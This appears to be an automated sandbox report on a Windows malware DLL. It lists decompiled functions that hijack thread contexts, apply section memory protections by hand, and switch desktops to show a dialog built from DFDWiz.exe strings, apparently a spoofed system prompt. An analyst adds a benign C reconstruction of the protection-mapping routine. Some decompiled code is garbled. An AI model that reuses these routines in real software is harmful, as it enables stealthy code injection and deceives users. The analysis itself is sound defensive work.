    • Instruction Fuzzy Hash: B321F53210534A6FD3218AADDD51BA7BBE8DB82724F154B0DE6A1476C5F722A409C3A2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECAAFC0(signed int __eax, void* _a4, intOrPtr _a8) {
    				void* _v0;
    				long _v536;
    				intOrPtr _v540;
    				struct _CONTEXT _v716;
    				struct _CONTEXT _v720;
    				void* __edi;
    				long _t16;
    				intOrPtr _t19;
    				long _t20;
    				signed int _t27;
    				void* _t30;
    				intOrPtr _t32;
    				long _t37;
    				signed int _t39;
    				void* _t40;
    				intOrPtr _t41;
    
    				_t41 = _a8;
    				_t39 = __eax;
    				_v716 = 0x10001;
    				_t16 = NtGetContextThread(_a4,  &_v716);
    				if(_t16 < 0) {
    					L19:
    					return _t16;
    				}
    				if(_t39 != 0xffffffff) {
    					_t16 = _t39 + 1;
    				} else {
    					_t16 =  *0x6ecb0958; // 0x0
    					_t39 = 0;
    				}
    				if(_t39 >= _t16) {
    					goto L19;
    				} else {
    					_t27 = _t39 * 0x2c;
    					_t37 = _v536;
    					_t40 = _t16 - _t39;
    					do {
    						_t32 =  *0x6ecb0950; // 0x0
    						_t19 = _t41;
    						_t30 = _t27 + _t32;
    						if(_t19 == 0) {
    							_t20 = 0;
    						} else {
    							if(_t19 == 1) {
    								_t20 = 1;
    							} else {
    								_t20 = ( *(_t30 + 0x14) & 0x000000ff) >> 0x00000002 & 0x00000001;
    							}
    						}
    						if((( *(_t30 + 0x14) & 0x000000ff) >> 0x00000001 & 0x00000001) != _t20) {
    							if(_t20 == 0) {
    								_t20 = E6ECAAF50(_t30, _t37);
    							} else {
    								_t20 = E6ECAAF90(_t30, _t37);
    							}
    							if(_t20 != 0) {
    								_v536 = _t20;
    								_t20 = NtSetContextThread(_v0,  &_v720);
    								_t37 = _v540;
    							}
    						}
    						_t27 = _t27 + 0x2c;
    						_t40 = _t40 - 1;
    					} while (_t40 != 0);
    					return _t20;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: ContextThread
    • String ID:
    • API String ID: 1591575202-0
    • Opcode ID: dd1b42898cd233bf7c4d23448886f2646cd961462693ae00d1249fdc1acdf003
    • Instruction ID: f4228b7e20dfbd8c65413847b6bb294fc31b8ebef7941566883e5c81a8cfaacc
    • Opcode Fuzzy Hash: dd1b42898cd233bf7c4d23448886f2646cd961462693ae00d1249fdc1acdf003
    • Instruction Fuzzy Hash: B221DBB150435B4BD3709AED88807EBB7D9AB85350F40062AD674C714CF671D9458392
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECAB1F0(long** __eax, intOrPtr _a4) {
    				signed int _v0;
    				void* __esi;
    				long _t10;
    				signed int _t16;
    				void* _t21;
    				intOrPtr* _t23;
    				void* _t24;
    
    				_t23 = __eax;
    				 *__eax = 0;
    				__eax[1] = 0;
    				__eax[2] = 0;
    				_t10 = E6ECAB0A0(__eax);
    				if( *_t23 != 0) {
    					_t16 = 0;
    					if( *((intOrPtr*)(_t23 + 8)) <= 0) {
    						L7:
    						return _t10;
    					}
    					do {
    						_t10 = E6ECAAE20(0x5a, 0,  *((intOrPtr*)( *_t23 + _t16 * 4)));
    						_t21 = _t10;
    						_t24 = _t24 + 0xc;
    						if(_t21 != 0) {
    							NtSuspendThread(_t21, 0);
    							E6ECAAFC0(_v0, _t21, _a4);
    							_t24 = _t24 + 8;
    							_t10 = NtClose(_t21);
    						}
    						_t16 = _t16 + 1;
    					} while (_t16 <  *((intOrPtr*)(_t23 + 8)));
    					goto L7;
    				}
    				return _t10;
    			}

    APIs
      • Part of subcall function 6ECAB0A0: NtQuerySystemInformation.NTDLL ref: 6ECAB0B5
      • Part of subcall function 6ECAB0A0: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000), ref: 6ECAB0DB
      • Part of subcall function 6ECAB0A0: NtQuerySystemInformation.NTDLL ref: 6ECAB0FC
      • Part of subcall function 6ECAB0A0: GetCurrentProcessId.KERNEL32(?,00000000,00000005,00000000,000000FF,000000FF), ref: 6ECAB118
      • Part of subcall function 6ECAB0A0: GetCurrentThreadId.KERNEL32 ref: 6ECAB146
      • Part of subcall function 6ECAB0A0: HeapAlloc.KERNEL32(00000000,00000000,00000200), ref: 6ECAB16A
      • Part of subcall function 6ECAB0A0: VirtualFree.KERNEL32(00000000,000000FF,00008000,00000005,00000000,000000FF,000000FF), ref: 6ECAB1DB
      • Part of subcall function 6ECAAE20: NtOpenThread.NTDLL ref: 6ECAAE72
    • NtSuspendThread.NTDLL(00000000,00000000), ref: 6ECAB23B
      • Part of subcall function 6ECAAFC0: NtGetContextThread.NTDLL ref: 6ECAAFE6
      • Part of subcall function 6ECAAFC0: NtSetContextThread.NTDLL ref: 6ECAB07D
    • NtClose.NTDLL(00000000), ref: 6ECAB253
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread$AllocContextCurrentInformationQuerySystemVirtual$CloseFreeHeapOpenProcessSuspend
    • String ID:
    • API String ID: 1213046356-0
    • Opcode ID: fc41af2628a402dc0e663f27d0976610eb69affcfda8df536d29c55f9b3c2c83
    • Instruction ID: 057b2656a9f58c91431ef0e499006aeae2c60760202d8e9e4bd9517c6cacb20d
    • Opcode Fuzzy Hash: fc41af2628a402dc0e663f27d0976610eb69affcfda8df536d29c55f9b3c2c83
    • Instruction Fuzzy Hash: F001817510020B5FD360CF98D8D0BAB73E9AFC4705F104A1DE6555B248F7746445C661
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E6ECAAD39(void* __eax, intOrPtr* __ebx, void* __ecx, intOrPtr* __edx, long _a4, long _a8, long _a12, long* _a16) {
    				void* _v4;
    				void* _t71;
    
    				_t71 = __eax +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx;
    				 *__ebx =  *__ebx + _t71;
    				 *__ebx =  *__ebx + _t71 +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__edx;
    				 *((intOrPtr*)(__ecx - 0x75)) =  *((intOrPtr*)(__ecx - 0x75)) + __edx;
    				_push(__ecx);
    				_v4 = _a4;
    				_a4 = _a8;
    				return 0 | NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16) > 0x00000000;
    			}

    APIs
    • NtProtectVirtualMemory.NTDLL ref: 6ECAAE07
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryProtectVirtual
    • String ID:
    • API String ID: 2706961497-0
    • Opcode ID: b4d77e731b5723b151f1067eb9d00d78f8638cf145a7724cd033c2e58dfa8113
    • Instruction ID: 027784726755196d9db7976355574b23ee220dc855b509b338acd059849fbc04
    • Opcode Fuzzy Hash: b4d77e731b5723b151f1067eb9d00d78f8638cf145a7724cd033c2e58dfa8113
    • Instruction Fuzzy Hash: ACF0FE761083519FC705CF58CC92E5A77E4AF9A710B148A5DE1A5C7684D730E414DB23
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA18D0(void* __edi) {
    				void* _v4;
    				long _v8;
    				long _v12;
    				intOrPtr _t18;
    				signed int _t20;
    				signed int _t22;
    				long _t23;
    				void* _t28;
    				void* _t36;
    				unsigned int* _t37;
    
    				_t36 = __edi;
    				_t18 =  *((intOrPtr*)(__edi + 0x138));
    				_t28 = 0;
    				if(0 >=  *((intOrPtr*)(__edi + 0x46))) {
    					L13:
    					return 0;
    				} else {
    					_t37 = _t18 + 0x24;
    					do {
    						_t20 =  *_t37;
    						if((_t20 & 0x00000020) != 0) {
    							 *_t37 = _t20 | 0x60000000;
    						}
    						_t22 =  *_t37 >> 0x1d;
    						if(_t22 > 6) {
    							L10:
    							_t23 = 0x40;
    						} else {
    							switch( *((intOrPtr*)(_t22 * 4 +  &M6ECA1984))) {
    								case 0:
    									goto L11;
    								case 1:
    									_t23 = 0x10;
    									goto L11;
    								case 2:
    									goto L11;
    								case 3:
    									goto L11;
    								case 4:
    									goto L10;
    							}
    						}
    						L11:
    						_v4 =  *((intOrPtr*)(_t37 - 0x18)) +  *((intOrPtr*)(_t36 + 0x144));
    						_v12 = _t23;
    						_v8 =  *((intOrPtr*)(_t37 - 0x1c));
    						if(NtProtectVirtualMemory(0xffffffff,  &_v4,  &_v8, _t23,  &_v12) < 0) {
    							return 9;
    						} else {
    							goto L12;
    						}
    						goto L15;
    						L12:
    						_t28 = _t28 + 1;
    						_t37 =  &(_t37[0xa]);
    					} while (_t28 < ( *(_t36 + 0x46) & 0x0000ffff));
    					goto L13;
    				}
    				L15:
    			}
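E6ECA18D0 above walks the image's IMAGE_SECTION_HEADER array (0x28-byte stride, Characteristics at +0x24, VirtualAddress at +0x0C, VirtualSize at +0x08, the count read as a 16-bit NumberOfSections), forces any IMAGE_SCN_CNT_CODE section to executable+readable (`| 0x60000000`), turns the top three Characteristics bits into a PAGE_* protection and applies it to its own process (handle 0xffffffff) with NtProtectVirtualMemory, returning 9 on the first failure. Only part of its jump table survived decompilation: index 1 gives 0x10 (PAGE_EXECUTE), index 4 reaches the 0x40 branch, and anything above 6 gives 0x40 (PAGE_EXECUTE_READWRITE). The C below is an added example written for this report, not the sample's own code: it performs the same walk over a constructed four-section table and returns the planned (address, size, protection) triples instead of calling NtProtectVirtualMemory. The complete execute/read/write to PAGE_* mapping is the conventional loader mapping and is an assumption where the listing's table is missing; the loader-struct offsets the listing uses (+0x138, +0x46, +0x144) and the sample image base are illustrative.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Page protections (winnt.h values) and the section flags the walk uses. */
#define PAGE_NOACCESS          0x01u
#define PAGE_READONLY          0x02u
#define PAGE_READWRITE         0x04u
#define PAGE_EXECUTE           0x10u
#define PAGE_EXECUTE_READ      0x20u
#define PAGE_EXECUTE_READWRITE 0x40u

#define IMAGE_SCN_CNT_CODE     0x00000020u
#define IMAGE_SCN_MEM_EXECUTE  0x20000000u   /* bit 29 */
#define IMAGE_SCN_MEM_READ     0x40000000u   /* bit 30 */
#define IMAGE_SCN_MEM_WRITE    0x80000000u   /* bit 31 */

#define SECTION_HEADER_SIZE 0x28u            /* the listing's 10-dword stride */

typedef struct {
    uint32_t address;   /* image_base + VirtualAddress (the listing's _v4) */
    uint32_t size;      /* VirtualSize (_v8) */
    uint32_t protect;   /* NewProtect handed to NtProtectVirtualMemory (_v12) */
} section_protect_t;

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void wr32(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
}

/* Characteristics -> PAGE_*: code sections are forced E|R first (the
   listing's |= 0x60000000), then the top three bits select the protection.
   Indices 1 and 7 are what the decompiler recovered; the rest is the
   conventional loader mapping (an assumption, not the sample's table). */
uint32_t section_protection(uint32_t characteristics)
{
    if (characteristics & IMAGE_SCN_CNT_CODE)
        characteristics |= IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ;

    switch (characteristics >> 29) {        /* bit29 = E, bit30 = R, bit31 = W */
    case 0:  return PAGE_NOACCESS;
    case 1:  return PAGE_EXECUTE;           /* 0x10 in the listing */
    case 2:  return PAGE_READONLY;
    case 3:  return PAGE_EXECUTE_READ;
    case 4:  return PAGE_READWRITE;         /* write implies read on x86 */
    case 5:  return PAGE_EXECUTE_READWRITE;
    case 6:  return PAGE_READWRITE;
    default: return PAGE_EXECUTE_READWRITE; /* 7 = E|R|W, the listing's "> 6" branch */
    }
}

/* The walk itself: one (address, size, protect) triple per section header,
   in place of the NtProtectVirtualMemory(-1, ...) call the listing makes. */
size_t plan_section_protections(const uint8_t *section_table, uint16_t num_sections,
                                uint32_t image_base,
                                section_protect_t *out, size_t max_out)
{
    size_t n = 0;
    for (uint16_t i = 0; i < num_sections && n < max_out; i++) {
        const uint8_t *hdr = section_table + (size_t)i * SECTION_HEADER_SIZE;
        out[n].size    = rd32(hdr + 0x08);                     /* VirtualSize     */
        out[n].address = image_base + rd32(hdr + 0x0c);        /* VirtualAddress  */
        out[n].protect = section_protection(rd32(hdr + 0x24)); /* Characteristics */
        n++;
    }
    return n;
}

/* Constructed input: a four-section table laid out as a linker would emit
   it (only the fields the walk reads are filled in). */
static void put_section(uint8_t *hdr, const char *name, uint32_t vsize,
                        uint32_t va, uint32_t characteristics)
{
    memset(hdr, 0, SECTION_HEADER_SIZE);
    memcpy(hdr, name, strlen(name));    /* names here are all <= 8 bytes */
    wr32(hdr + 0x08, vsize);
    wr32(hdr + 0x0c, va);
    wr32(hdr + 0x24, characteristics);
}

size_t demo_plan(section_protect_t *out, size_t max_out)
{
    static uint8_t table[4 * SECTION_HEADER_SIZE];
    put_section(table + 0 * SECTION_HEADER_SIZE, ".text",  0x1000, 0x1000,
                IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ);
    put_section(table + 1 * SECTION_HEADER_SIZE, ".rdata", 0x0800, 0x2000,
                0x40u | IMAGE_SCN_MEM_READ);                    /* INITIALIZED_DATA | R */
    put_section(table + 2 * SECTION_HEADER_SIZE, ".data",  0x0400, 0x3000,
                0x40u | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE);
    put_section(table + 3 * SECTION_HEADER_SIZE, ".code2", 0x0200, 0x4000,
                IMAGE_SCN_CNT_CODE);   /* no MEM_* bits: normalised to E|R by the walk */
    return plan_section_protections(table, 4, 0x10000000u, out, max_out);
}
```

A loader that applies section protections itself, rather than letting the OS image loader do it, is the tell-tale of a manually mapped image, which is consistent with the hook table and thread fix-up routines elsewhere in this report.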

    APIs
    • NtProtectVirtualMemory.NTDLL ref: 6ECA1959
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryProtectVirtual
    • String ID:
    • API String ID: 2706961497-0
    • Opcode ID: 6701af273ba216e04db1d8a6bc35617d4f7c451ce3d3430abdb91125383c4d5b
    • Instruction ID: 0079c24d0eb7ab2be348d3d346b944752fea07f1891fd1caa23ac116f06adc22
    • Opcode Fuzzy Hash: 6701af273ba216e04db1d8a6bc35617d4f7c451ce3d3430abdb91125383c4d5b
    • Instruction Fuzzy Hash: 081173B56082139FE724CFADD5907D6B3E6FB44310F004A2AEA9587240F774A94DCB92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECAAE20(long _a4, intOrPtr _a8, intOrPtr _a12) {
    				void* _v4;
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				void* _v24;
    				intOrPtr _v28;
    				void* _v32;
    				void* _v36;
    				void** _t30;
    
    				_t30 =  &_v36;
    				_v36 = 0;
    				_v24 = 0x18;
    				_v20 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v8 = 0;
    				_v4 = 0;
    				if(_a8 != 0) {
    					_v12 = 2;
    				}
    				_v32 = 0;
    				_v28 = _a12;
    				_t18 = (0 | NtOpenThread( &_v36, _a4,  &_v24,  &_v32) < 0x00000000) - 1; // -1
    				return _t18 &  *_t30;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: OpenThread
    • String ID:
    • API String ID: 3092547327-0
    • Opcode ID: 8936b218d008d1655a736589cecff2c34729ea288f5f9e18c1d9757e92024a36
    • Instruction ID: a1a0c9167393e8424c4b86ed1e9e170334b19663c6f772ffeb6a6890d85ca94e
    • Opcode Fuzzy Hash: 8936b218d008d1655a736589cecff2c34729ea288f5f9e18c1d9757e92024a36
    • Instruction Fuzzy Hash: FBF05FB18183029FD384DF29C480A5BBBE4BB88744F008E2DF0A9D6240E775D648CF92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECAADE0(long _a4, long _a8, long _a12, long* _a16) {
    				void* _v4;
    
    				_v4 = _a4;
    				_a4 = _a8;
    				return 0 | NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16) > 0x00000000;
    			}

    APIs
    • NtProtectVirtualMemory.NTDLL ref: 6ECAAE07
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryProtectVirtual
    • String ID:
    • API String ID: 2706961497-0
    • Opcode ID: 9034f9849f4124ffa5d6300b52b6d281f43325fd0382167c2827b217c63955f6
    • Instruction ID: 977696db1eb376bfeb7cd403dcd196d176b1d921820ac5a4aa554ddd6eb5900f
    • Opcode Fuzzy Hash: 9034f9849f4124ffa5d6300b52b6d281f43325fd0382167c2827b217c63955f6
    • Instruction Fuzzy Hash: 9CE0BFB620C342AF8349CF58D951C5BB3E9ABC8720F10CE1DB1BAC3690D730D8088B22
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECAA500(void* _a4, void* _a8, long _a12) {
    				union _MEMORY_INFORMATION_CLASS _v4;
    				long* _t17;
    
    				_v4 = 0;
    				_t7 = (0 | NtQueryVirtualMemory(0xffffffff, _a4, 0, _a8, _a12, _t17) < 0x00000000) - 1; // -1
    				return _t7 &  *_t17;
    			}

    APIs
    • NtQueryVirtualMemory.NTDLL(000000FF,?,00000000,?,6ECAA6A4), ref: 6ECAA520
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryQueryVirtual
    • String ID:
    • API String ID: 2850889275-0
    • Opcode ID: 36acf529eb6e35959c71046f94ee37866bfc9005c8f00531d1d5c4fd6157f5e6
    • Instruction ID: 2ff7a7854dce104d4c154d16df2c3deefb0325be0ec8d6041211f3c7231c7665
    • Opcode Fuzzy Hash: 36acf529eb6e35959c71046f94ee37866bfc9005c8f00531d1d5c4fd6157f5e6
    • Instruction Fuzzy Hash: 86E0ECB511C202AFD714DF58CC81FABB3ECAB84364F208A1DB0B5C62C0D771E4088B22
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E6ECA9D10() {
    				intOrPtr _v32;
    				char _v264;
    				char _v272;
    				void* _v284;
    				WCHAR* _v288;
    				void* _v292;
    				WCHAR* _v296;
    				WCHAR* _v300;
    				char _v324;
    				char* _v328;
    				intOrPtr _v332;
    				WCHAR* _v340;
    				void* _v344;
    				void* _v348;
    				void* _v356;
    				void* _v360;
    				void* _v364;
    				void* _v368;
    				intOrPtr _v372;
    				long _v376;
    				WCHAR* _v380;
    				char _v384;
    				void* _v388;
    				void* _v392;
    				void* _v396;
    				char _v400;
    				struct HINSTANCE__* _v404;
    				void* _v408;
    				short _v412;
    				short _v416;
    				char _v420;
    				struct HDESK__* _t62;
    				struct HDESK__* _t66;
    				CHAR* _t72;
    				WCHAR* _t114;
    				void* _t118;
    				WCHAR* _t119;
    				WCHAR* _t120;
    				struct HDESK__* _t121;
    				struct HDESK__* _t122;
    				char _t130;
    				struct HINSTANCE__* _t136;
    				void* _t139;
    				void* _t141;
    				struct HINSTANCE__* _t142;
    				WCHAR* _t143;
    				WCHAR* _t144;
    				WCHAR* _t145;
    				WCHAR* _t146;
    				WCHAR* _t147;
    				WCHAR* _t148;
    				WCHAR* _t151;
    				short* _t153;
    				short* _t154;
    				short* _t155;
    
    				_t62 =  *0x6ecb0480; // 0x0
    				SwitchDesktop(_t62);
    				_t121 =  *0x6ecb0480; // 0x0
    				SetThreadDesktop(_t121);
    				__imp__CoInitializeEx(0, 6);
    				_t142 = LoadLibraryA("comctl32.dll");
    				_v404 = _t142;
    				if(_t142 != 0) {
    					_push(0xff000000);
    					_push(1);
    					_push( &_v400);
    					_push(_t142);
    					_v400 = 0xc590294f;
    					_v396 = 0;
    					_v392 = 0;
    					_v388 = 0;
    					E6ECA1DB0();
    					_t153 =  &(( &_v412)[8]);
    					if(_v388 != 0) {
    						_t72 = GetCommandLineA();
    						_v420 = 0;
    						_t139 = E6ECAA3D0(_t72,  &_v420);
    						_t154 =  &(_t153[4]);
    						_v416 = _t139;
    						if(_t139 != 0) {
    							if(_v420 > 3) {
    								_t130 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
    								wsprintfA( &_v272, "%s%s", _t130, "DFDWiz.exe");
    								_t155 =  &(_t154[8]);
    								_t136 = LoadLibraryExA( &_v264, 0, 0x20);
    								if(_t136 != 0) {
    									_t141 = HeapAlloc(GetProcessHeap(), 8, 0x1770);
    									if(_t141 != 0) {
    										_t23 = _t141 + 0x190; // 0x190
    										_t143 = _t23;
    										if(LoadStringW(_t136, 0x79, _t143, 0xc8) > 0) {
    											_v340 = _t143;
    										}
    										_t25 = _t141 + 0x320; // 0x320
    										_t144 = _t25;
    										if(LoadStringW(_t136, 0x7c, _t144, 0x3e8) > 0) {
    											_t114 = StrChrW(_t144, 0xa);
    											if(_t114 != 0) {
    												_v340 =  &(_t114[1]);
    											}
    										}
    										_t27 = _t141 + 0xaf0; // 0xaf0
    										_t145 = _t27;
    										if(FormatMessageW(0xaff, _t136, 0x50000001, 0, _t145, 0x64, 0) != 0) {
    											_v288 = _t145;
    										}
    										_t29 = _t141 + 0xbb8; // 0xbb8
    										_t146 = _t29;
    										if(LoadStringW(_t136, 0x1b0, _t146, 0x64) > 0) {
    											_t30 = _t141 + 0xc80; // 0xc80
    											if(LoadStringW(_t136, 0xf6, _t30, 0x64) > 0) {
    												_t31 = _t141 + 0xc80; // 0xc80
    												_v372 = _t31;
    												_v384 = 1;
    												_v380 = _t146;
    												_v376 = 8;
    												_v332 = 2;
    												_v324 = 1;
    												_v328 =  &_v384;
    											}
    										}
    										_t40 = _t141 + 0xd48; // 0xd48
    										_t147 = _t40;
    										if(LoadStringW(_t136, 0x7e, _t147, 0x64) > 0) {
    											_v296 = _t147;
    										}
    										_t42 = _t141 + 0xe10; // 0xe10
    										_t148 = _t42;
    										if(LoadStringW(_t136, 0x7f, _t148, 0x64) > 0) {
    											_v300 = _t148;
    										}
    										_t44 = _t141 + 0xed8; // 0xed8
    										if(LoadStringW(_t136, 0x81, _t44, 0xc8) > 0) {
    											PathBuildRootW( &_v412, PathGetDriveNumberA( &_v272));
    											_t47 = _t141 + 0x1068; // 0x1068
    											_t120 = _t47;
    											GetVolumeInformationW( &_v416, _t120, 0x64, 0, 0, 0, 0, 0);
    											_v412 = 0;
    											_t50 = _t141 + 0x1130; // 0x1130
    											_t151 = _t50;
    											if( *_t120 == 0) {
    												_t120 = L"<n/a>";
    											}
    											_t52 = _t141 + 0xed8; // 0xed8
    											wsprintfW(_t151, _t52,  &_v416, _t120);
    											_t155 =  &(_t155[8]);
    											_v300 = _t151;
    										}
    										_t118 = HeapAlloc(GetProcessHeap(), 0, 0x105);
    										if(_t118 != 0) {
    											wsprintfA(_t118, "/c start /b \"\" \"%s\" f w %d",  *((intOrPtr*)(_v416 + 0xc)), 5);
    											E6ECA9C50(0, 0x83f2, _t118);
    											_v400( &_v380, 0, 0, 0, 0, 0);
    											HeapFree(GetProcessHeap(), 0, _t118);
    											if(_v32 != 0) {
    												Sleep(0x1f4);
    												E6ECA96D0(0);
    											}
    											Sleep(0x1f4);
    										}
    										if(FormatMessageW(0xaff, _t136, 0xb0000002, 0, _t141, 0x1f4, 0) != 0) {
    											_t59 = _t141 + 0x3e8; // 0x3e8
    											_t119 = _t59;
    											if(FormatMessageW(0xaff, _t136, 0x50000004, 0, _t119, 0x64, 0) != 0) {
    												MessageBoxW(0, _t141, _t119, 0x40);
    												Sleep(0x1f4);
    											}
    										}
    										HeapFree(GetProcessHeap(), 0, _t141);
    										_t142 = _v404;
    									}
    									FreeLibrary(_t136);
    									_t139 = _v408;
    								}
    							}
    							LocalFree(_t139);
    						}
    					}
    					FreeLibrary(_t142);
    				}
    				__imp__CoUninitialize();
    				_t66 =  *0x6ecb0484; // 0x0
    				SwitchDesktop(_t66);
    				_t122 =  *0x6ecb0484; // 0x0
    				SetThreadDesktop(_t122);
    				return 0;
    			}

    APIs
    • SwitchDesktop.USER32(00000000), ref: 6ECA9D1E
    • SetThreadDesktop.USER32(00000000), ref: 6ECA9D2B
    • CoInitializeEx.OLE32(00000000,00000006), ref: 6ECA9D36
    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 6ECA9D41
    • GetCommandLineA.KERNEL32(?,00000001,FF000000), ref: 6ECA9D89
      • Part of subcall function 6ECAA3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6ECAA3DB
      • Part of subcall function 6ECAA3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6ECAA3F4
    • wsprintfA.USER32 ref: 6ECA9DD4
    • LoadLibraryExA.KERNEL32(?,00000000,00000020,?,?,?,?,?,?,00000001,FF000000), ref: 6ECA9DE8
